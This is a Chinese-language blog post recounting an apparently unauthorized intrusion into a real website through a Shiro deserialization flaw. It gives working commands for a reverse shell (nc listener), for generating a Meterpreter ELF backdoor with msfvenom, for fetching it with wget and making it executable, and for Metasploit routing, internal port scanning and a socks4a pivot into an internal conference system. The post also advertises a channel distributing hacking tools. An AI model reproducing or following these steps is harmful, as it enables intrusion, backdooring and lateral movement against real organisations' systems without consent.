實戰|某網站shiro反序列化漏洞的滲透過程
VSole2022-08-07 06:34:20
打進內網以后的過程沒有繼續深入搞,具體原因大家懂的,
前期打點,開始的想法是爆破個弱口令的,弱口令爆破一圈沒有找到有用的賬戶,

返回包存在 :Set-Cookie: rememberMe=deleteMe; 參數, 測試一下 shiro漏洞,萬一沒修復就撿到了,美滋滋
成功打到DNSLOG 返回信息

得到log,確定漏洞是存在的,腳本寫入linux反彈shell的命令,
vps 開啟NC 監聽 nc -lvp 777 成功返回

獲得服務器權限 root ,開始通過dnslog 知道服務器是通外網的,利用msf 生成 elf 后門
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf
關注公眾號:hack之道,后臺回復關鍵詞:666,獲取最新滲透教程和工具。
把生成好的后門放在遠程HTTP服務上面,
在shell里,wget 遠程下載

成功下載以后,chmod 給后門權限 777 就行,-rwxrwxrwx 1 root root

msf 運行命令 use exploit/multi/handler 獲得shell反彈地址
set payload linux/x64/meterpreter/reverse_tcp
地址填寫VPS 端口寫后門端口就好了,直接run

查看內網路由,添加路由命令
run get_local_subnets //獲取路由地址 run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由 run autoroute -p //查看添加的路由 run autorouute -d //刪除添加的路由

內網掃描端口 use auxiliary/scanner/portscan/tcp

利用msf socks4a模塊代理
use auxiliary/server/socks4a set SRVHOST IP set SRVPORT 端口
運行返回信息:
msf5 auxiliary(server/socks4a) > run [*] Auxiliary module running as background job 0. [*] Starting the socks4a proxy server
本地利用代理連接 代理的服務器 設置好端口 ,瀏覽器訪問
某會議系統

VSole
網絡安全專家